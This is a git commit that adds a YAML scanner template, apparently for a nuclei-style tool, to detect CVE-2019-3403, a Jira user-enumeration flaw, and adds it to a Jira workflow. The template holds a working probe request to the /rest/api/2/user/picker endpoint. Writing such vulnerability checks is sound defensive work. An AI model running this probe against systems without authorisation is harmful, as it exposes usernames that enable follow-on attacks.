Create CVE-2019-3403.yaml (#873)

2026-01-31 15:53:33 +08:00 · 2021-02-16 22:25:16 +05:30
parent 4187512212
commit a3b3641627
2 changed files with 34 additions and 0 deletions
--- a/cves/2019/CVE-2019-3403.yaml
+++ b/cves/2019/CVE-2019-3403.yaml
@@ -0,0 +1,33 @@
+id: CVE-2019-3403
+
+info:
+  name: User enumeration via an incorrect authorisation check
+  author: Ganofins
+  severity: medium
+  description: The /rest/api/2/user/picker rest resource in Jira before version 7.13.3, from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1 allows remote attackers to enumerate usernames via an incorrect authorisation check.
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2019-3403
+  tags: cve,cve2019,atlassian,jira
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/rest/api/2/user/picker?query="
+
+    matchers-condition: and
+    matchers:
+
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - 'application/json'
+        part: header
+
+      - type: word
+        words:
+          - users
+          - total
+          - header
+        condition: and
--- a/workflows/jira-workflow.yaml
+++ b/workflows/jira-workflow.yaml
@@ -22,6 +22,7 @@ workflows:
      - template: cves/2019/CVE-2019-8449.yaml
      - template: cves/2019/CVE-2019-8451.yaml
      - template: cves/2019/CVE-2019-11581.yaml
+      - template: cves/2019/CVE-2019-3403.yaml
      - template: cves/2020/CVE-2020-14179.yaml
      - template: cves/2020/CVE-2020-14181.yaml
      - template: vulnerabilities/jira/jira-service-desk-signup.yaml